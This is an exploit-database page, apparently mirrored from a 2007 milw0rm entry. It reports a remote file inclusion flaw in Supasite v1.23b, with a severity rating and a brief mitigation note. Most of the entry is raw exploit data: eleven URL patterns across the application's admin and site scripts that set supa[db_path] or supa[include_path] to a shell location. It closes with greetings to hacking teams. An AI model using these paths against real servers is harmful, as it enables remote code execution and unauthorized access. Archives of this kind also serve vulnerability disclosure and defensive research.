header-logo
Suggest Exploit
vendor:
Supasite
by:
GolD_M = [Mahmood_ali]
7.5
CVSS
HIGH
Remote File Include
CWE
Product Name: Supasite
Affected Version From: v1.23b
Affected Version To: v1.23b
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

Supasite v1.23b <= Multiple Remote File Include Vulnerability

The Supasite v1.23b has a vulnerability that allows remote attackers to include arbitrary files. This can lead to remote code execution and unauthorized access to sensitive information.

Mitigation:

Apply the necessary patches and updates provided by the vendor. Make sure to sanitize user inputs and validate file inclusion requests to prevent this vulnerability.
Source

Exploit-DB raw data:

# Supasite v1.23b <= Multiple Remote File Include Vulnerablitiy
# D.Script: http://belnet.dl.sourceforge.net/sourceforge/supasite/supasite1.23b.tar.gz
# Discovered by: GolD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Exploit:[Path]/supasite/common_functions.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_auth_cookies.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_mods.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_news.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_settings.php?supa[include_path]=Shell
# Exploit:[Path]/supasite/admin_topics.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_users.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/admin_utilities.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/backend_site.php?supa[include_path]=Shell
# Exploit:[Path]/supasite/site_comment.php?supa[db_path]=Shell
# Exploit:[Path]/supasite/site_news.php?supa[db_path]=Shell
# Greetz To: Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group

# milw0rm.com [2007-04-21]